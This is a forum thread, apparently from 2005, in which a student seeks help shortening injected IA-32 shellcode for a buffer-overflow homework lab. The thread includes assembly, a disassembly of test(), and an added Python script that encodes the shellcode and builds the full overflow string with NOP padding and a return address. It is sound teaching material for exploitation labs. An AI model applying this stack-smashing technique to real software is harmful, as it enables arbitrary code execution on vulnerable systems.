buffer overflow ia32 problem


mindspin311
03-26-2005, 09:40 PM
Hi. I'm having a problem exploiting a buffer string, and returning back to the main function as if nothing happened.

I have a function:

int getbuf()
{
    char buf[12];
    Gets(buf);
    return 1;
}

*Note that 24 bytes of memory are allocated, so I have 28 bytes for the code, and 4 more for the return addy*

I send a string which generates the following IA32 assembly code:

mov $0x162febc1, %eax        # returns cookie instead of 1
mov $0x80489f1, %ebp         # old return addy of getbuf; returns to test() after getbuf is called
movl $0xdeadbeef, -4(%ebp)   # old local variable of test; used in test after the call of getbuf to check for corruption of stack
movl $0x8048984, 4(%ebp)     # return addy of test, which goes back to main
pushl $0x80489f1             # push the return addy
ret                          # I hope this works ^^

(nop's to fill in extra space if applicable)
(return address: points to first line of program)

*Note that this would work, but it's a few bytes too long. I've tried replacing the push with push %ebp...
but then I get some weird code that I didn't write, like pop (%eax,%eax,1), or even addresses are altered, pointing to different parts of the program or dead memory.

I have to get this code to work in 28 bytes.
(The return addy bytes, 29-32, are fine)

Any suggestions for shortening the code? Or why I get weird assembly code when I try to mess around with it?

Here's the code for test also:
Dump of assembler code for function test:
0x080489d8 <test+0>: push %ebp
0x080489d9 <test+1>: mov %esp,%ebp
0x080489db <test+3>: sub $0x14,%esp
0x080489de <test+6>: push $0x3
0x080489e0 <test+8>: movl $0xdeadbeef,0xfffffffc(%ebp)
0x080489e7 <test+15>: call 0x8048c3c <entry_check>
0x080489ec <test+20>: call 0x8048a48 <getbuf>
0x080489f1 <test+25>: mov %eax,%edx
0x080489f3 <test+27>: mov 0xfffffffc(%ebp),%eax
0x080489f6 <test+30>: add $0x10,%esp
0x080489f9 <test+33>: cmp $0xdeadbeef,%eax
0x080489fe <test+38>: je 0x8048a14 <test+60>
0x08048a00 <test+40>: sub $0xc,%esp
0x08048a03 <test+43>: push $0x8049620
0x08048a08 <test+48>: call 0x80486ec <puts>
0x08048a0d <test+53>: add $0x10,%esp
0x08048a10 <test+56>: leave
0x08048a11 <test+57>: ret
0x08048a12 <test+58>: mov %esi,%esi
0x08048a14 <test+60>: cmp 0x804a01c,%edx
0x08048a1a <test+66>: je 0x8048a2c <test+84>
0x08048a1c <test+68>: sub $0x8,%esp
0x08048a1f <test+71>: push %edx
0x08048a20 <test+72>: push $0x804941f
0x08048a25 <test+77>: call 0x804873c <printf>
0x08048a2a <test+82>: jmp 0x8048a0d <test+53>
0x08048a2c <test+84>: sub $0x8,%esp
0x08048a2f <test+87>: push %edx
0x08048a30 <test+88>: push $0x804943a
0x08048a35 <test+93>: call 0x804873c <printf>
0x08048a3a <test+98>: movl $0x3,(%esp,1)
0x08048a41 <test+105>: call 0x8048c4c <validate>
0x08048a46 <test+110>: jmp 0x8048a0d <test+53>
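
Added here as an example, not code from the post: a small Python script that hand-encodes the six instructions listed above so their byte count can be checked against the 28-byte budget, and lays out the overflow string (code, NOP padding, then the little-endian return address). The opcode encodings are the standard IA-32 ones; the cookie and the two test() addresses are taken from the post. The buffer address is a placeholder (the post does not give it), and the check that the payload contains no 0x0a byte assumes Gets stops at a newline the way gets(3) does. The script also encodes the "push %ebp" variant the post mentions, purely to show its size; it does not explain the stray disassembly the poster saw.

```python
import struct

# x86-32 register numbers used in "mov $imm32, %reg" (B8+r) and "push %reg" (50+r)
REG = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esp": 4, "ebp": 5, "esi": 6, "edi": 7}


def imm32(value):
    """Little-endian 32-bit immediate, exactly as it sits in the instruction stream."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def mov_imm_reg(reg, value):
    """mov $imm32, %reg  ->  B8+r imm32  (5 bytes)"""
    return bytes([0xB8 + REG[reg]]) + imm32(value)


def movl_imm_disp8_ebp(disp8, value):
    """movl $imm32, disp8(%ebp)  ->  C7 45 disp8 imm32  (7 bytes)
    ModRM 0x45 = mod 01 (8-bit displacement), reg /0, rm 101 (%ebp)."""
    return bytes([0xC7, 0x45, disp8 & 0xFF]) + imm32(value)


def push_imm(value):
    """pushl $imm32  ->  68 imm32  (5 bytes)"""
    return b"\x68" + imm32(value)


def push_reg(reg):
    """push %reg  ->  50+r  (1 byte)"""
    return bytes([0x50 + REG[reg]])


RET = b"\xC3"
NOP = b"\x90"

COOKIE = 0x162FEBC1      # value test() compares %eax against (from the post)
TEST_RET = 0x080489F1    # test+25, where getbuf normally returns (from the post)
MAIN_RET = 0x08048984    # return address of test(), back to main (from the post)


def original_sequence():
    """The six instructions in the post, encoded byte for byte."""
    return (mov_imm_reg("eax", COOKIE)
            + mov_imm_reg("ebp", TEST_RET)
            + movl_imm_disp8_ebp(-4, 0xDEADBEEF)
            + movl_imm_disp8_ebp(4, MAIN_RET)
            + push_imm(TEST_RET)
            + RET)


def shortened_sequence():
    """Same sequence with 'pushl $0x80489f1' replaced by 'push %ebp';
    %ebp already holds that address after the second mov."""
    return (mov_imm_reg("eax", COOKIE)
            + mov_imm_reg("ebp", TEST_RET)
            + movl_imm_disp8_ebp(-4, 0xDEADBEEF)
            + movl_imm_disp8_ebp(4, MAIN_RET)
            + push_reg("ebp")
            + RET)


def fits(code, room=28):
    """True if the code leaves the 4-byte return-address slot untouched."""
    return len(code) <= room


def build_overflow(code, buf_addr, room=28):
    """String for Gets(): code, NOP padding up to `room` bytes, then the
    little-endian return address pointing back at the start of the buffer.
    Raises if the code does not fit or a gets()-style reader would truncate it."""
    if not fits(code, room):
        raise ValueError(f"code is {len(code)} bytes, only {room} available before the return address")
    payload = code + NOP * (room - len(code)) + imm32(buf_addr)
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; a gets()-style reader stops at newline")
    return payload


def hexdump(data):
    return " ".join(f"{b:02x}" for b in data)


if __name__ == "__main__":
    for name, code in (("as posted", original_sequence()), ("push %ebp", shortened_sequence())):
        print(f"{name}: {len(code)} bytes  {hexdump(code)}")
    BUF_ADDR = 0x55683000   # placeholder: the real value is the address of buf in getbuf's frame
    print("overflow string:", hexdump(build_overflow(shortened_sequence(), BUF_ADDR)))
```

Counting the encodings is the quickest way to see where the budget goes: the two movl-to-memory instructions cost 7 bytes each because each carries a ModRM byte, a displacement and a full 32-bit immediate, and a pushl of an immediate costs 5 where a push of a register costs 1.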

mindspin311
03-26-2005, 09:53 PM
*NOTE*

I've had similar messages removed from other forums, because I didn't clarify the purpose of my question.

I just wanted to say that this problem I'm having is for HOMEWORK. I am not asking this question so I can hack into anyone's computer or anything of that sort.

Thank you.

mindspin311
03-26-2005, 10:11 PM
Also note that address 0x804a01c holds the value of the cookie (0x162febc1).